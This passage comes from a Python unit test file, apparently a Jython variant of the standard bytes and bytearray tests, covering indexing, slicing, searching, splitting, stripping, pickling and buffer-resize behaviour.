b = self.type2test()
self.assertEqual(len(b), 0)
self.assertRaises(IndexError, lambda: b[0])
self.assertRaises(IndexError, lambda: b[1])
self.assertRaises(IndexError, lambda: b[sys.maxint])
self.assertRaises(IndexError, lambda: b[sys.maxint+1])
self.assertRaises(IndexError, lambda: b[10**100])
self.assertRaises(IndexError, lambda: b[-1])
self.assertRaises(IndexError, lambda: b[-2])
self.assertRaises(IndexError, lambda: b[-sys.maxint])
self.assertRaises(IndexError, lambda: b[-sys.maxint-1])
self.assertRaises(IndexError, lambda: b[-sys.maxint-2])
self.assertRaises(IndexError, lambda: b[-10**100])
def test_from_list(self):
ints = list(range(256))
b = self.type2test(i for i in ints)
self.assertEqual(len(b), 256)
self.assertEqual(list(b), ints)
def test_from_index(self):
b = self.type2test([Indexable(), Indexable(1), Indexable(254),
Indexable(255)])
self.assertEqual(list(b), [0, 1, 254, 255])
self.assertRaises(ValueError, self.type2test, [Indexable(-1)])
self.assertRaises(ValueError, self.type2test, [Indexable(256)])
def test_from_ssize(self):
self.assertEqual(self.type2test(0), b'')
self.assertEqual(self.type2test(1), b'\x00')
self.assertEqual(self.type2test(5), b'\x00\x00\x00\x00\x00')
self.assertRaises(ValueError, self.type2test, -1)
self.assertEqual(self.type2test('0', 'ascii'), b'0')
self.assertEqual(self.type2test(b'0'), b'0')
self.assertRaises(OverflowError, self.type2test, sys.maxsize + 1)
def test_constructor_type_errors(self):
self.assertRaises(TypeError, self.type2test, 0.0)
class C:
pass
# allowed in 2.x
#self.assertRaises(TypeError, self.type2test, ["0"])
self.assertRaises(TypeError, self.type2test, [0.0])
self.assertRaises(TypeError, self.type2test, [None])
self.assertRaises(TypeError, self.type2test, [C()])
def test_constructor_value_errors(self):
self.assertRaises(ValueError, self.type2test, [-1])
self.assertRaises(ValueError, self.type2test, [-sys.maxint])
self.assertRaises(ValueError, self.type2test, [-sys.maxint-1])
self.assertRaises(ValueError, self.type2test, [-sys.maxint-2])
self.assertRaises(ValueError, self.type2test, [-10**100])
self.assertRaises(ValueError, self.type2test, [256])
self.assertRaises(ValueError, self.type2test, [257])
self.assertRaises(ValueError, self.type2test, [sys.maxint])
self.assertRaises(ValueError, self.type2test, [sys.maxint+1])
self.assertRaises(ValueError, self.type2test, [10**100])
def test_compare(self):
b1 = self.type2test([1, 2, 3])
b2 = self.type2test([1, 2, 3])
b3 = self.type2test([1, 3])
self.assertEqual(b1, b2)
self.assertTrue(b2 != b3)
self.assertTrue(b1 <= b2)
self.assertTrue(b1 <= b3)
self.assertTrue(b1 < b3)
self.assertTrue(b1 >= b2)
self.assertTrue(b3 >= b2)
self.assertTrue(b3 > b2)
self.assertFalse(b1 != b2)
self.assertFalse(b2 == b3)
self.assertFalse(b1 > b2)
self.assertFalse(b1 > b3)
self.assertFalse(b1 >= b3)
self.assertFalse(b1 < b2)
self.assertFalse(b3 < b2)
self.assertFalse(b3 <= b2)
@check_bytes_warnings
def test_compare_to_str(self):
# Byte comparisons with unicode should always fail!
# Test this for all expected byte orders and Unicode character sizes
self.assertEqual(self.type2test(b"\0a\0b\0c") == u"abc", False)
self.assertEqual(self.type2test(b"\0\0\0a\0\0\0b\0\0\0c") == u"abc", False)
self.assertEqual(self.type2test(b"a\0b\0c\0") == u"abc", False)
self.assertEqual(self.type2test(b"a\0\0\0b\0\0\0c\0\0\0") == u"abc", False)
self.assertEqual(self.type2test() == unicode(), False)
self.assertEqual(self.type2test() != unicode(), True)
def test_reversed(self):
input = list(map(ord, "Hello"))
b = self.type2test(input)
output = list(reversed(b))
input.reverse()
self.assertEqual(output, input)
def test_getslice(self):
def by(s):
return self.type2test(map(ord, s))
b = by("Hello, world")
self.assertEqual(b[:5], by("Hello"))
self.assertEqual(b[1:5], by("ello"))
self.assertEqual(b[5:7], by(", "))
self.assertEqual(b[7:], by("world"))
self.assertEqual(b[7:12], by("world"))
self.assertEqual(b[7:100], by("world"))
self.assertEqual(b[:-7], by("Hello"))
self.assertEqual(b[-11:-7], by("ello"))
self.assertEqual(b[-7:-5], by(", "))
self.assertEqual(b[-5:], by("world"))
self.assertEqual(b[-5:12], by("world"))
self.assertEqual(b[-5:100], by("world"))
self.assertEqual(b[-100:5], by("Hello"))
def test_extended_getslice(self):
# Test extended slicing by comparing with list slicing.
L = list(range(255))
b = self.type2test(L)
indices = (0, None, 1, 3, 19, 100, -1, -2, -31, -100)
for start in indices:
for stop in indices:
# Skip step 0 (invalid)
for step in indices[1:]:
self.assertEqual(b[start:stop:step], self.type2test(L[start:stop:step]))
#XXX: Jython doesn't support codepoints outside of the UTF-16 range even at
# parse time. Maybe someday we might push the error off to later, but for
# now I'm just commenting this whole test out.
# See http://bugs.jython.org/issue1836 for more.
# def test_encoding(self):
# sample = u"Hello world\n\u1234\u5678\u9abc\udef0"
# for enc in ("utf8", "utf16"):
# b = self.type2test(sample, enc)
# self.assertEqual(b, self.type2test(sample.encode(enc)))
# self.assertRaises(UnicodeEncodeError, self.type2test, sample, "latin1")
# b = self.type2test(sample, "latin1", "ignore")
# self.assertEqual(b, self.type2test(sample[:-4], "utf-8"))
def test_decode(self):
sample = u"Hello world\n\u1234\u5678\u9abc\def0\def0"
for enc in ("utf8", "utf16"):
b = self.type2test(sample, enc)
self.assertEqual(b.decode(enc), sample)
sample = u"Hello world\n\x80\x81\xfe\xff"
b = self.type2test(sample, "latin1")
self.assertRaises(UnicodeDecodeError, b.decode, "utf8")
self.assertEqual(b.decode("utf8", "ignore"), "Hello world\n")
self.assertEqual(b.decode(errors="ignore", encoding="utf8"),
"Hello world\n")
def test_from_int(self):
b = self.type2test(0)
self.assertEqual(b, self.type2test())
b = self.type2test(10)
self.assertEqual(b, self.type2test([0]*10))
b = self.type2test(10000)
self.assertEqual(b, self.type2test([0]*10000))
def test_concat(self):
b1 = self.type2test(b"abc")
b2 = self.type2test(b"def")
self.assertEqual(b1 + b2, b"abcdef")
self.assertEqual(b1 + bytes(b"def"), b"abcdef")
self.assertEqual(bytes(b"def") + b1, b"defabc")
self.assertRaises(TypeError, lambda: b1 + u"def")
self.assertRaises(TypeError, lambda: u"abc" + b2)
def test_repeat(self):
for b in b"abc", self.type2test(b"abc"):
self.assertEqual(b * 3, b"abcabcabc")
self.assertEqual(b * 0, b"")
self.assertEqual(b * -1, b"")
self.assertRaises(TypeError, lambda: b * 3.14)
self.assertRaises(TypeError, lambda: 3.14 * b)
# XXX Shouldn't bytes and bytearray agree on what to raise?
self.assertRaises((OverflowError, MemoryError),
lambda: b * sys.maxsize)
def test_repeat_1char(self):
self.assertEqual(self.type2test(b'x')*100, self.type2test([ord('x')]*100))
def test_contains(self):
b = self.type2test(b"abc")
self.assertIn(ord('a'), b)
self.assertIn(int(ord('a')), b)
self.assertNotIn(200, b)
self.assertRaises(ValueError, lambda: 300 in b)
self.assertRaises(ValueError, lambda: -1 in b)
self.assertRaises(TypeError, lambda: None in b)
self.assertRaises(TypeError, lambda: float(ord('a')) in b)
self.assertRaises(TypeError, lambda: u"a" in b)
for f in bytes, bytearray:
self.assertIn(f(b""), b)
self.assertIn(f(b"a"), b)
self.assertIn(f(b"b"), b)
self.assertIn(f(b"c"), b)
self.assertIn(f(b"ab"), b)
self.assertIn(f(b"bc"), b)
self.assertIn(f(b"abc"), b)
self.assertNotIn(f(b"ac"), b)
self.assertNotIn(f(b"d"), b)
self.assertNotIn(f(b"dab"), b)
self.assertNotIn(f(b"abd"), b)
def test_fromhex(self):
self.assertRaises(TypeError, self.type2test.fromhex)
self.assertRaises(TypeError, self.type2test.fromhex, 1)
self.assertEqual(self.type2test.fromhex(u''), self.type2test())
b = bytearray([0x1a, 0x2b, 0x30, 0xca, 0xfe, 0xba, 0xbe]) # challenging signs
self.assertEqual(self.type2test.fromhex(u'1a2B30CafEBabe'), b)
self.assertEqual(self.type2test.fromhex(u' 1A 2B 30 CafeBabe '), b)
self.assertEqual(self.type2test.fromhex(u'0000'), b'\0\0')
self.assertRaises(ValueError, self.type2test.fromhex, u'a')
self.assertRaises(ValueError, self.type2test.fromhex, u'rt')
self.assertRaises(ValueError, self.type2test.fromhex, u'1a b cd')
self.assertRaises(ValueError, self.type2test.fromhex, u'\x00')
self.assertRaises(ValueError, self.type2test.fromhex, u'12 \x00 34')
def test_join(self):
self.assertEqual(self.type2test(b"").join([]), b"")
self.assertEqual(self.type2test(b"").join([b""]), b"")
for lst in [[b"abc"], [b"a", b"bc"], [b"ab", b"c"], [b"a", b"b", b"c"]]:
lst = list(map(self.type2test, lst))
self.assertEqual(self.type2test(b"").join(lst), b"abc")
self.assertEqual(self.type2test(b"").join(tuple(lst)), b"abc")
self.assertEqual(self.type2test(b"").join(iter(lst)), b"abc")
self.assertEqual(self.type2test(b".").join([b"ab", b"cd"]), b"ab.cd")
# XXX more...
def test_count(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.count(b'i'), 4)
self.assertEqual(b.count(b'ss'), 2)
self.assertEqual(b.count(b'w'), 0)
def test_startswith(self):
b = self.type2test(b'hello')
self.assertFalse(self.type2test().startswith(b"anything"))
self.assertTrue(b.startswith(b"hello"))
self.assertTrue(b.startswith(b"hel"))
self.assertTrue(b.startswith(b"h"))
self.assertFalse(b.startswith(b"hellow"))
self.assertFalse(b.startswith(b"ha"))
def test_endswith(self):
b = self.type2test(b'hello')
self.assertFalse(bytearray().endswith(b"anything"))
self.assertTrue(b.endswith(b"hello"))
self.assertTrue(b.endswith(b"llo"))
self.assertTrue(b.endswith(b"o"))
self.assertFalse(b.endswith(b"whello"))
self.assertFalse(b.endswith(b"no"))
def test_find(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.find(b'ss'), 2)
self.assertEqual(b.find(b'ss', 3), 5)
self.assertEqual(b.find(b'ss', 1, 7), 2)
self.assertEqual(b.find(b'ss', 1, 3), -1)
self.assertEqual(b.find(b'w'), -1)
self.assertEqual(b.find(b'mississippian'), -1)
def test_rfind(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.rfind(b'ss'), 5)
self.assertEqual(b.rfind(b'ss', 3), 5)
self.assertEqual(b.rfind(b'ss', 0, 6), 2)
self.assertEqual(b.rfind(b'w'), -1)
self.assertEqual(b.rfind(b'mississippian'), -1)
def test_index(self):
b = self.type2test(b'world')
self.assertEqual(b.index(b'w'), 0)
self.assertEqual(b.index(b'orl'), 1)
self.assertRaises(ValueError, b.index, b'worm')
self.assertRaises(ValueError, b.index, b'ldo')
def test_rindex(self):
# XXX could be more rigorous
b = self.type2test(b'world')
self.assertEqual(b.rindex(b'w'), 0)
self.assertEqual(b.rindex(b'orl'), 1)
self.assertRaises(ValueError, b.rindex, b'worm')
self.assertRaises(ValueError, b.rindex, b'ldo')
def test_replace(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.replace(b'i', b'a'), b'massassappa')
self.assertEqual(b.replace(b'ss', b'x'), b'mixixippi')
def test_split(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.split(b'i'), [b'm', b'ss', b'ss', b'pp', b''])
self.assertEqual(b.split(b'ss'), [b'mi', b'i', b'ippi'])
self.assertEqual(b.split(b'w'), [b])
def test_split_whitespace(self):
for b in (b' arf barf ', b'arf\tbarf', b'arf\nbarf', b'arf\rbarf',
b'arf\fbarf', b'arf\vbarf'):
b = self.type2test(b)
self.assertEqual(b.split(), [b'arf', b'barf'])
self.assertEqual(b.split(None), [b'arf', b'barf'])
self.assertEqual(b.split(None, 2), [b'arf', b'barf'])
for b in (b'a\x1Cb', b'a\x1Db', b'a\x1Eb', b'a\x1Fb'):
b = self.type2test(b)
self.assertEqual(b.split(), [b])
self.assertEqual(self.type2test(b' a bb c ').split(None, 0), [b'a bb c '])
self.assertEqual(self.type2test(b' a bb c ').split(None, 1), [b'a', b'bb c '])
self.assertEqual(self.type2test(b' a bb c ').split(None, 2), [b'a', b'bb', b'c '])
self.assertEqual(self.type2test(b' a bb c ').split(None, 3), [b'a', b'bb', b'c'])
def test_split_string_error(self):
self.assertRaises(TypeError, self.type2test(b'a b').split, u' ')
def test_split_unicodewhitespace(self):
b = self.type2test(b"\x09\x0A\x0B\x0C\x0D\x1C\x1D\x1E\x1F")
self.assertEqual(b.split(), [b'\x1c\x1d\x1e\x1f'])
def test_rsplit(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.rsplit(b'i'), [b'm', b'ss', b'ss', b'pp', b''])
self.assertEqual(b.rsplit(b'ss'), [b'mi', b'i', b'ippi'])
self.assertEqual(b.rsplit(b'w'), [b])
def test_rsplit_whitespace(self):
for b in (b' arf barf ', b'arf\tbarf', b'arf\nbarf', b'arf\rbarf',
b'arf\fbarf', b'arf\vbarf'):
b = self.type2test(b)
self.assertEqual(b.rsplit(), [b'arf', b'barf'])
self.assertEqual(b.rsplit(None), [b'arf', b'barf'])
self.assertEqual(b.rsplit(None, 2), [b'arf', b'barf'])
self.assertEqual(self.type2test(b' a bb c ').rsplit(None, 0), [b' a bb c'])
self.assertEqual(self.type2test(b' a bb c ').rsplit(None, 1), [b' a bb', b'c'])
self.assertEqual(self.type2test(b' a bb c ').rsplit(None, 2), [b' a', b'bb', b'c'])
self.assertEqual(self.type2test(b' a bb c ').rsplit(None, 3), [b'a', b'bb', b'c'])
def test_rsplit_string_error(self):
self.assertRaises(TypeError, self.type2test(b'a b').rsplit, u' ')
def test_rsplit_unicodewhitespace(self):
b = self.type2test(b"\x09\x0A\x0B\x0C\x0D\x1C\x1D\x1E\x1F")
self.assertEqual(b.rsplit(), [b'\x1c\x1d\x1e\x1f'])
def test_partition(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.partition(b'ss'), (b'mi', b'ss', b'issippi'))
self.assertEqual(b.partition(b'w'), (b'mississippi', b'', b''))
def test_rpartition(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.rpartition(b'ss'), (b'missi', b'ss', b'ippi'))
self.assertEqual(b.rpartition(b'i'), (b'mississipp', b'i', b''))
self.assertEqual(b.rpartition(b'w'), (b'', b'', b'mississippi'))
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for b in b"", b"a", b"abc", b"\xffab\x80", b"\0\0\377\0\0":
b = self.type2test(b)
ps = pickle.dumps(b, proto)
q = pickle.loads(ps)
self.assertEqual(b, q)
def test_strip(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.strip(b'i'), b'mississipp')
self.assertEqual(b.strip(b'm'), b'ississippi')
self.assertEqual(b.strip(b'pi'), b'mississ')
self.assertEqual(b.strip(b'im'), b'ssissipp')
self.assertEqual(b.strip(b'pim'), b'ssiss')
self.assertEqual(b.strip(b), b'')
def test_lstrip(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.lstrip(b'i'), b'mississippi')
self.assertEqual(b.lstrip(b'm'), b'ississippi')
self.assertEqual(b.lstrip(b'pi'), b'mississippi')
self.assertEqual(b.lstrip(b'im'), b'ssissippi')
self.assertEqual(b.lstrip(b'pim'), b'ssissippi')
def test_rstrip(self):
b = self.type2test(b'mississippi')
self.assertEqual(b.rstrip(b'i'), b'mississipp')
self.assertEqual(b.rstrip(b'm'), b'mississippi')
self.assertEqual(b.rstrip(b'pi'), b'mississ')
self.assertEqual(b.rstrip(b'im'), b'mississipp')
self.assertEqual(b.rstrip(b'pim'), b'mississ')
def test_strip_whitespace(self):
b = self.type2test(b' \t\n\r\f\vabc \t\n\r\f\v')
self.assertEqual(b.strip(), b'abc')
self.assertEqual(b.lstrip(), b'abc \t\n\r\f\v')
self.assertEqual(b.rstrip(), b' \t\n\r\f\vabc')
def test_strip_bytearray(self):
self.assertEqual(self.type2test(b'abc').strip(memoryview(b'ac')), b'b')
self.assertEqual(self.type2test(b'abc').lstrip(memoryview(b'ac')), b'bc')
self.assertEqual(self.type2test(b'abc').rstrip(memoryview(b'ac')), b'ab')
def test_strip_string_error(self):
self.assertRaises(TypeError, self.type2test(b'abc').strip, u'b')
self.assertRaises(TypeError, self.type2test(b'abc').lstrip, u'b')
self.assertRaises(TypeError, self.type2test(b'abc').rstrip, u'b')
def test_ord(self):
b = self.type2test(b'\0A\x7f\x80\xff')
self.assertEqual([ord(b[i:i+1]) for i in range(len(b))],
[0, 65, 127, 128, 255])
def test_none_arguments(self):
# issue 11828
b = self.type2test(b'hello')
l = self.type2test(b'l')
h = self.type2test(b'h')
x = self.type2test(b'x')
o = self.type2test(b'o')
self.assertEqual(2, b.find(l, None))
self.assertEqual(3, b.find(l, -2, None))
self.assertEqual(2, b.find(l, None, -2))
self.assertEqual(0, b.find(h, None, None))
self.assertEqual(3, b.rfind(l, None))
self.assertEqual(3, b.rfind(l, -2, None))
self.assertEqual(2, b.rfind(l, None, -2))
self.assertEqual(0, b.rfind(h, None, None))
self.assertEqual(2, b.index(l, None))
self.assertEqual(3, b.index(l, -2, None))
self.assertEqual(2, b.index(l, None, -2))
self.assertEqual(0, b.index(h, None, None))
self.assertEqual(3, b.rindex(l, None))
self.assertEqual(3, b.rindex(l, -2, None))
self.assertEqual(2, b.rindex(l, None, -2))
self.assertEqual(0, b.rindex(h, None, None))
self.assertEqual(2, b.count(l, None))
self.assertEqual(1, b.count(l, -2, None))
self.assertEqual(1, b.count(l, None, -2))
self.assertEqual(0, b.count(x, None, None))
self.assertEqual(True, b.endswith(o, None))
self.assertEqual(True, b.endswith(o, -2, None))
self.assertEqual(True, b.endswith(l, None, -2))
self.assertEqual(False, b.endswith(x, None, None))
self.assertEqual(True, b.startswith(h, None))
self.assertEqual(True, b.startswith(l, -2, None))
self.assertEqual(True, b.startswith(h, None, -2))
self.assertEqual(False, b.startswith(x, None, None))
def test_find_etc_raise_correct_error_messages(self):
# issue 11828
b = self.type2test(b'hello')
x = self.type2test(b'x')
self.assertRaisesRegexp(TypeError, r'\bfind\b', b.find,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\brfind\b', b.rfind,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\bindex\b', b.index,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\brindex\b', b.rindex,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\bcount\b', b.count,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\bstartswith\b', b.startswith,
x, None, None, None)
self.assertRaisesRegexp(TypeError, r'\bendswith\b', b.endswith,
x, None, None, None)
def test_translate(self):
# adapted from AssortedBytesTest.test_translate
b = self.type2test(b'hello')
rosetta = self.type2test().join(map(chr,range(256)))
rosetta[ord('o')] = ord('e')
c = b.translate(rosetta, b'l')
self.assertEqual(b, b'hello')
self.assertEqual(c, b'hee')
c = b.translate(None, b'e')
self.assertEqual(c, b'hllo')
c = b.translate(None, b'the larch')
self.assertEqual(c, b'o')
stone = self.type2test(''.join(map(chr,range(1,256))))
self.assertRaises(ValueError, b.translate, stone, b'short')
self.assertRaises(TypeError, b.translate, rosetta, None)
self.assertRaises(TypeError, b.translate, None, None)
class ByteArrayTest(BaseBytesTest):
type2test = bytearray
def test_nohash(self):
self.assertRaises(TypeError, hash, bytearray())
def test_bytearray_api(self):
short_sample = b"Hello world\n"
sample = short_sample + b"\0"*(20 - len(short_sample))
tfn = tempfile.mktemp()
try:
# Prepare
with open(tfn, "wb") as f:
f.write(short_sample)
# Test readinto
with open(tfn, "rb") as f:
b = bytearray(20)
n = f.readinto(b)
self.assertEqual(n, len(short_sample))
# Python 2.x
b_sample = (ord(s) for s in sample)
self.assertEqual(list(b), list(b_sample))
# Test writing in binary mode
with open(tfn, "wb") as f:
f.write(b)
with open(tfn, "rb") as f:
self.assertEqual(f.read(), sample)
# Text mode is ambiguous; don't test
finally:
try:
os.remove(tfn)
except os.error:
pass
def test_reverse(self):
b = bytearray(b'hello')
self.assertEqual(b.reverse(), None)
self.assertEqual(b, b'olleh')
b = bytearray(b'hello1') # test even number of items
b.reverse()
self.assertEqual(b, b'1olleh')
b = bytearray()
b.reverse()
self.assertFalse(b)
def test_regexps(self):
def by(s):
return bytearray(map(ord, s))
b = by("Hello, world")
self.assertEqual(re.findall(r"\w+", b), [by("Hello"), by("world")])
def test_setitem(self):
b = bytearray([1, 2, 3])
b[1] = 100
self.assertEqual(b, bytearray([1, 100, 3]))
b[-1] = 200
self.assertEqual(b, bytearray([1, 100, 200]))
b[0] = Indexable(10)
self.assertEqual(b, bytearray([10, 100, 200]))
try:
b[3] = 0
self.fail("Didn't raise IndexError")
except IndexError:
pass
try:
b[-10] = 0
self.fail("Didn't raise IndexError")
except IndexError:
pass
try:
b[0] = 256
self.fail("Didn't raise ValueError")
except ValueError:
pass
try:
b[0] = Indexable(-1)
self.fail("Didn't raise ValueError")
except ValueError:
pass
try:
b[0] = None
self.fail("Didn't raise TypeError")
except TypeError:
pass
def test_delitem(self):
b = bytearray(range(10))
del b[0]
self.assertEqual(b, bytearray(range(1, 10)))
del b[-1]
self.assertEqual(b, bytearray(range(1, 9)))
del b[4]
self.assertEqual(b, bytearray([1, 2, 3, 4, 6, 7, 8]))
def test_setslice(self):
b = bytearray(range(10))
self.assertEqual(list(b), list(range(10)))
b[0:5] = bytearray([1, 1, 1, 1, 1])
self.assertEqual(b, bytearray([1, 1, 1, 1, 1, 5, 6, 7, 8, 9]))
del b[0:-5]
self.assertEqual(b, bytearray([5, 6, 7, 8, 9]))
b[0:0] = bytearray([0, 1, 2, 3, 4])
self.assertEqual(b, bytearray(range(10)))
b[-7:-3] = bytearray([100, 101])
self.assertEqual(b, bytearray([0, 1, 2, 100, 101, 7, 8, 9]))
b[3:5] = [3, 4, 5, 6]
self.assertEqual(b, bytearray(range(10)))
b[3:0] = [42, 42, 42]
self.assertEqual(b, bytearray([0, 1, 2, 42, 42, 42, 3, 4, 5, 6, 7, 8, 9]))
def test_extended_set_del_slice(self):
indices = (0, None, 1, 3, 19, 300, 1<<333, -1, -2, -31, -300)
for start in indices:
for stop in indices:
# Skip invalid step 0
for step in indices[1:]:
L = list(range(255))
b = bytearray(L)
# Make sure we have a slice of exactly the right length,
# but with different data.
data = L[start:stop:step]
data.reverse()
L[start:stop:step] = data
b[start:stop:step] = data
self.assertEqual(b, bytearray(L))
del L[start:stop:step]
del b[start:stop:step]
self.assertEqual(b, bytearray(L))
def test_setslice_trap(self):
# This test verifies that we correctly handle assigning self
# to a slice of self (the old Lambert Meertens trap).
b = bytearray(range(256))
b[8:] = b
self.assertEqual(b, bytearray(list(range(8)) + list(range(256))))
def test_iconcat(self):
b = bytearray(b"abc")
b1 = b
b += b"def"
self.assertEqual(b, b"abcdef")
self.assertEqual(b, b1)
self.assertTrue(b is b1)
b += b"xyz"
self.assertEqual(b, b"abcdefxyz")
try:
b += u""
except TypeError:
pass
else:
self.fail("bytes += unicode didn't raise TypeError")
def test_irepeat(self):
b = bytearray(b"abc")
b1 = b
b *= 3
self.assertEqual(b, b"abcabcabc")
self.assertEqual(b, b1)
self.assertTrue(b is b1)
def test_irepeat_1char(self):
b = bytearray(b"x")
b1 = b
b *= 100
self.assertEqual(b, b"x"*100)
self.assertEqual(b, b1)
self.assertTrue(b is b1)
def test_alloc(self):
b = bytearray()
alloc = b.__alloc__()
self.assertTrue(alloc >= 0)
seq = [alloc]
for i in range(100):
b += b"x"
alloc = b.__alloc__()
self.assertTrue(alloc >= len(b))
if alloc not in seq:
seq.append(alloc)
def test_extend(self):
orig = b'hello'
a = bytearray(orig)
a.extend(a)
self.assertEqual(a, orig + orig)
self.assertEqual(a[5:], orig)
a = bytearray(b'')
# Test iterators that don't have a __length_hint__
a.extend(map(ord, orig * 25))
a.extend(ord(x) for x in orig * 25)
self.assertEqual(a, orig * 50)
self.assertEqual(a[-5:], orig)
a = bytearray(b'')
a.extend(iter(map(ord, orig * 50)))
self.assertEqual(a, orig * 50)
self.assertEqual(a[-5:], orig)
a = bytearray(b'')
a.extend(list(map(ord, orig * 50)))
self.assertEqual(a, orig * 50)
self.assertEqual(a[-5:], orig)
a = bytearray(b'')
self.assertRaises(ValueError, a.extend, [0, 1, 2, 256])
self.assertRaises(ValueError, a.extend, [0, 1, 2, -1])
self.assertEqual(len(a), 0)
a = bytearray(b'')
a.extend([Indexable(ord('a'))])
self.assertEqual(a, b'a')
def test_remove(self):
b = bytearray(b'hello')
b.remove(ord('l'))
self.assertEqual(b, b'helo')
b.remove(ord('l'))
self.assertEqual(b, b'heo')
self.assertRaises(ValueError, lambda: b.remove(ord('l')))
self.assertRaises(ValueError, lambda: b.remove(400))
self.assertRaises(TypeError, lambda: b.remove(u'e'))
# remove first and last
b.remove(ord('o'))
b.remove(ord('h'))
self.assertEqual(b, b'e')
self.assertRaises(TypeError, lambda: b.remove(u'e'))
b.remove(Indexable(ord('e')))
self.assertEqual(b, b'')
def test_pop(self):
b = bytearray(b'world')
self.assertEqual(b.pop(), ord('d'))
self.assertEqual(b.pop(0), ord('w'))
self.assertEqual(b.pop(-2), ord('r'))
self.assertRaises(IndexError, lambda: b.pop(10))
self.assertRaises(IndexError, lambda: bytearray().pop())
# test for issue #6846
self.assertEqual(bytearray(b'\xff').pop(), 0xff)
def test_nosort(self):
self.assertRaises(AttributeError, lambda: bytearray().sort())
def test_append(self):
b = bytearray(b'hell')
b.append(ord('o'))
self.assertEqual(b, b'hello')
self.assertEqual(b.append(100), None)
b = bytearray()
b.append(ord('A'))
self.assertEqual(len(b), 1)
self.assertRaises(TypeError, lambda: b.append(u'o'))
b = bytearray()
b.append(Indexable(ord('A')))
self.assertEqual(b, b'A')
def test_insert(self):
b = bytearray(b'msssspp')
b.insert(1, ord('i'))
b.insert(4, ord('i'))
b.insert(-2, ord('i'))
b.insert(1000, ord('i'))
self.assertEqual(b, b'mississippi')
# allowed in 2.x
#self.assertRaises(TypeError, lambda: b.insert(0, b'1'))
b = bytearray()
b.insert(0, Indexable(ord('A')))
self.assertEqual(b, b'A')
def test_copied(self):
# Issue 4348. Make sure that operations that don't mutate the array
# copy the bytes.
b = bytearray(b'abc')
self.assertFalse(b is b.replace(b'abc', b'cde', 0))
t = bytearray([i for i in range(256)])
x = bytearray(b'')
self.assertFalse(x is x.translate(t))
def test_partition_bytearray_doesnt_share_nullstring(self):
a, b, c = bytearray(b"x").partition(b"y")
self.assertEqual(b, b"")
self.assertEqual(c, b"")
self.assertTrue(b is not c)
b += b"!"
self.assertEqual(c, b"")
a, b, c = bytearray(b"x").partition(b"y")
self.assertEqual(b, b"")
self.assertEqual(c, b"")
# Same for rpartition
b, c, a = bytearray(b"x").rpartition(b"y")
self.assertEqual(b, b"")
self.assertEqual(c, b"")
self.assertTrue(b is not c)
b += b"!"
self.assertEqual(c, b"")
c, b, a = bytearray(b"x").rpartition(b"y")
self.assertEqual(b, b"")
self.assertEqual(c, b"")
def test_resize_forbidden(self):
# #4509: can't resize a bytearray when there are buffer exports, even
# if it wouldn't reallocate the underlying buffer.
# Furthermore, no destructive changes to the buffer may be applied
# before raising the error.
b = bytearray(range(10))
v = memoryview(b)
def resize(n):
b[1:-1] = range(n + 1, 2*n - 1)
resize(10)
orig = b[:]
self.assertRaises(BufferError, resize, 11)
self.assertEqual(b, orig)
self.assertRaises(BufferError, resize, 9)
self.assertEqual(b, orig)
self.assertRaises(BufferError, resize, 0)
self.assertEqual(b, orig)
# Other operations implying resize
self.assertRaises(BufferError, b.pop, 0)
self.assertEqual(b, orig)
self.assertRaises(BufferError, b.remove, b[1])
self.assertEqual(b, orig)
def delitem():
del b[1]
self.assertRaises(BufferError, delitem)
self.assertEqual(b, orig)
# deleting a non-contiguous slice
def delslice():
b[1:-1:2] = b""
self.assertRaises(BufferError, delslice)
self.assertEqual(b, orig)
if test.test_support.is_jython:
# Show that releasing v releases the bytearray for size change
v.release()
b.pop()
def test_empty_bytearray(self):
# Issue #7561: operations on empty bytearrays could crash in many
# situations, due to a fragile implementation of the
# PyByteArray_AS_STRING() C macro.
self.assertRaises(ValueError, int, bytearray(b''))
class AssortedBytesTest(unittest.TestCase):
#
# Test various combinations of bytes and bytearray
#
@check_bytes_warnings
def test_repr_str(self):
for f in str, repr:
self.assertEqual(f(bytearray()), "bytearray(b'')")
self.assertEqual(f(bytearray([0])), "bytearray(b'\\x00')")
self.assertEqual(f(bytearray([0, 1, 254, 255])),
"bytearray(b'\\x00\\x01\\xfe\\xff')")
self.assertEqual(f(b"abc"), "b'abc'")
self.assertEqual(f(b"'"), '''b"'"''') # '''
self.assertEqual(f(b"'\""), r"""b'\'"'""") # '
def test_compare_bytes_to_bytearray(self):
self.assertEqual(b"abc" == bytes(b"abc"), True)
self.assertEqual(b"ab" != bytes(b"abc"), True)
self.assertEqual(b"ab" <= bytes(b"abc"), True)
self.assertEqual(b"ab" < bytes(b"abc"), True)
self.assertEqual(b"abc" >= bytes(b"ab"), True)
self.assertEqual(b"abc" > bytes(b"ab"), True)
self.assertEqual(b"abc" != bytes(b"abc"), False)
self.assertEqual(b"ab" == bytes(b"abc"), False)
self.assertEqual(b"ab" > bytes(b"abc"), False)
self.assertEqual(b"ab" >= bytes(b"abc"), False)
self.assertEqual(b"abc" < bytes(b"ab"), False)
self.assertEqual(b"abc" <= bytes(b"ab"), False)
self.assertEqual(bytes(b"abc") == b"abc", True)
self.assertEqual(bytes(b"ab") != b"abc", True)
self.assertEqual(bytes(b"ab") <= b"abc", True)
self.assertEqual(bytes(b"ab") < b"abc", True)
self.assertEqual(bytes(b"abc") >= b"ab", True)
self.assertEqual(bytes(b"abc") > b"ab", True)
self.assertEqual(bytes(b"abc") != b"abc", False)
self.assertEqual(bytes(b"ab") == b"abc", False)
self.assertEqual(bytes(b"ab") > b"abc", False)
self.assertEqual(bytes(b"ab") >= b"abc", False)
self.assertEqual(bytes(b"abc") < b"ab", False)
self.assertEqual(bytes(b"abc") <= b"ab", False)
def test_doc(self):
self.assertIsNotNone(bytearray.__doc__)
